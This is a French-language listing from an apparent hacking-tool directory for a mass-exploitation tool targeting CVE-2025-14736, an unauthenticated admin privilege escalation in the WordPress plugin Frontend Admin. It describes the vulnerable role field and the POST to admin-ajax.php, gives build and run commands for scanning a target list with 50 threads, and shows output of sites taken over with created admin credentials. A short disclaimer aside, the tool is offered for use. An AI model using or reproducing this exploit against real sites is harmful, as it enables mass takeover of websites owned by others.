Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-14736 — Élévation de privilèges non authentifiée vers administrateur via le champ de formulaire de rôle | Kitploit
Outils/GitHubGitHub/hyunchiya/cve-2025-14736
Escalade de PrivilègesAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubhyunchiya/cve-2025-14736

CVE-2025-14736

Élévation de privilèges non authentifiée vers administrateur via le champ de formulaire de rôle

Voir le dépôt
2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-14736

Frontend Admin par DynamiApps - Élévation de privilèges non authentifiée

Auteur : Hyun Chiya


Informations sur la vulnérabilité

ChampValeur
ID CVECVE-2025-14736
ExtensionFrontend Admin by DynamiApps
Versions affectées<= 3.28.25
Type de vulnérabilitéÉlévation de privilèges non authentifiée
SévéritéCritique

Description

Le plugin Frontend Admin pour WordPress est vulnérable à une élévation de privilèges non authentifiée en raison d'une validation insuffisante des champs contrôlés par l'utilisateur lors de l'inscription. Les attaquants peuvent injecter des rôles arbitraires, y compris administrator, en manipulant la charge utile de soumission du formulaire.

Analyse de la cause racine

La logique vulnérable réside dans le traitement des soumissions de formulaire où le champ role est considéré comme fiable à partir de l'entrée utilisateur sans vérifier si l'utilisateur est autorisé à attribuer ce rôle. Plus précisément, le champ acff[user][field_user_role_ID] peut être modifié en administrator.

Flux d'exploitation

root@kitploit:~
flowchart TD
    A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
    B --> C["Construct POST payload with 'role'='administrator'"]
    C --> D["POST to /wp-admin/admin-ajax.php"]
    D --> E{"Verification"}
    E -->|Success| F["New Admin User Created"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff

Prérequis

  1. La cible a le plugin "Frontend Admin" installé (version vulnérable).
  2. Un formulaire d'inscription frontend est activé et accessible.

Construction

root@kitploit:~
go build -o mass_exploit.exe mass_exploit.go

Utilisation

Scan de masse et exploitation

root@kitploit:~
.\mass_exploit.exe -l list.txt -t 50

Options

ArgumentDescription
-lChemin vers la liste des URL cibles (par défaut : list.txt)
-tNombre de threads simultanés (par défaut : 10)
-timeoutDélai d'attente de la requête en secondes (par défaut : 15)

Exemple de sortie

root@kitploit:~
>> [ EN LIGNE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14736 - Outil d'exploitation de masse                                      ║
    ║   Élévation de privilèges Frontend Admin par DynamiApps                              ║
    ║   Auteur : Hyun Chiya                                                                 ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATIONS ]
[*] 500 cibles chargées. Début du scan avec 50 threads...

[SUCCÈS] http://target.com | Utilisateur : hacker_mass | Mot de passe : Password123! | ID formulaire : 48
[SUCCÈS] http://example.org | Utilisateur : hacker_mass | Mot de passe : Password123! | ID formulaire : 32

[*] Scan terminé.

Avertissement

Cet outil est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez-le de manière responsable.

Auteur

Hyun Chiya

Télécharger l’outil